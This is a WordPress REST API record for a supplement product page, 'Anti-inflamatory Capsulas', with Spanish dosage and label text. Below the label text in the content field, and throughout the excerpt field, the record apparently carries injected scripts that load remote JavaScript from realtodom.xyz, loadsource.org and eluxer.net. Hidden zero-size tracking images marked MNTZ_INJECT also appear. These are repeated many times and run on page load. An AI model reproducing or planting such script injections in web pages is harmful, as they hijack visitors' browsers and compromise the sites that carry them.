{"id":319,"date":"2017-03-02T17:26:34","date_gmt":"2017-03-02T17:26:34","guid":{"rendered":"http:\/\/healthandpower.com.co\/?post_type=product&#038;p=319"},"modified":"2018-09-03T18:34:12","modified_gmt":"2018-09-03T18:34:12","slug":"anti-inflamatory","status":"publish","type":"product","link":"http:\/\/healthandpower.com.co\/?product=anti-inflamatory","title":{"rendered":"Anti-inflamatory Capsulas"},"content":{"rendered":"<p>INDICACIONES: Como suplemento diet\u00e9tico. Adultos tomar una (1) a dos (2) c\u00e1psulas tres veces al d\u00eda con comida o como indicado.<\/p>\n<p><a href=\"http:\/\/healthandpower.com.co\/wp-content\/uploads\/2017\/03\/ANTI.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-737\" src=\"http:\/\/healthandpower.com.co\/wp-content\/uploads\/2017\/03\/ANTI.jpg\" alt=\"ANTI\" width=\"360\" height=\"217\" srcset=\"http:\/\/healthandpower.com.co\/wp-content\/uploads\/2017\/03\/ANTI.jpg 360w, http:\/\/healthandpower.com.co\/wp-content\/uploads\/2017\/03\/ANTI-300x181.jpg 300w\" sizes=\"auto, (max-width: 360px) 100vw, 360px\" \/><\/a><\/p>\n<p>Este producto no est\u00e1 destinado a diagnosticar, tratar, curar ni prevenir ninguna enfermedad. Guardar en un lugar seco a temperatura ambiente (59 &#8211; 86 F).<\/p>\n<p>MANTENER FUERA DEL ALCANCE DE LOS NI\u00d1OS.<\/p>\n<p>*Esta declaraci\u00f3n no ha sido evaluada por la Administraci\u00f3n de Alimentos y Medicamentos.<\/p>\n<p>Otros ingredientes: gelatina y estearato de magnesio. Sin az\u00facar, almid\u00f3n, sal o conservantes a\u00f1adidos.<\/p>\n<p>Manufactured and Distributed by: National Board of Natural Medicine and Nutrition Inc. Englewood, Nj07631 USA R. 01100516983.<\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/optout\/set\/lat?jsonp=__twb_cb_42461172&amp;key=1b378c47aa1d605558&amp;cv=1532732347&amp;t=1532732349030\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/optout\/set\/lt?jsonp=__twb_cb_688711830&amp;key=1b378c47aa1d605558&amp;cv=68002&amp;t=1532732349030\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/optout\/set\/lat?jsonp=__twb_cb_981426066&amp;key=1b378c47aa1d605558&amp;cv=1532735461&amp;t=1532735464272\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<h1><span style=\"color: #00ccff;\">$59.000<\/span><\/h1>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=19\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=32\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=1532633882516\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=1532634504257\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=1532634747990\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=1532634777233\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/optout\/set\/lat?jsonp=__twb_cb_910808097&amp;key=1b378c47aa1d605558&amp;cv=1532641223&amp;t=1532641233892\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/optout\/set\/lt?jsonp=__twb_cb_802948756&amp;key=1b378c47aa1d605558&amp;cv=62381&amp;t=1532641233892\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=1532641233897\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/optout\/set\/lat?jsonp=__twb_cb_575485589&amp;key=1b378c47aa1d605558&amp;cv=1532732347&amp;t=1532732352785\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/optout\/set\/lt?jsonp=__twb_cb_331504603&amp;key=1b378c47aa1d605558&amp;cv=68002&amp;t=1532732352785\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=90f06&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_INJECT&amp;t=1532732352788\" alt=\"\" \/><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=1532732352788\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=865b2&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_INJECT&amp;t=1532732352793\" alt=\"\" \/><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=cd1d2&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_LOADED&amp;t=1532732352797\" alt=\"\" \/><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=6a131&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_LOADED&amp;t=1532732352798\" alt=\"\" \/><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=865b2&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_LOADED&amp;t=1532732353731\" alt=\"\" \/><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=90f06&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_LOADED&amp;t=1532732353778\" alt=\"\" \/><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=1532732373284\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/optout\/set\/lat?jsonp=__twb_cb_921560609&amp;key=1b378c47aa1d605558&amp;cv=1532735461&amp;t=1532735466622\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/optout\/set\/lt?jsonp=__twb_cb_209316605&amp;key=1b378c47aa1d605558&amp;cv=68068&amp;t=1532735466622\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=1532735466624\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=1532794430227\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=1532794604585\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"featured_media":739,"comment_status":"open","ping_status":"closed","template":"","meta":[],"product_brand":[],"product_cat":[46],"product_tag":[],"class_list":{"0":"post-319","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-antiinflamatorios","8":"first","9":"instock","10":"shipping-taxable","11":"purchasable","12":"product-type-simple"},"_links":{"self":[{"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=\/wp\/v2\/product\/319","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=\/wp\/v2\/product"}],"about":[{"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=319"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=\/wp\/v2\/media\/739"}],"wp:attachment":[{"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=319"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_brand&post=319"},{"taxonomy":"product_cat","embeddable":true,"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_cat&post=319"},{"taxonomy":"product_tag","embeddable":true,"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_tag&post=319"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}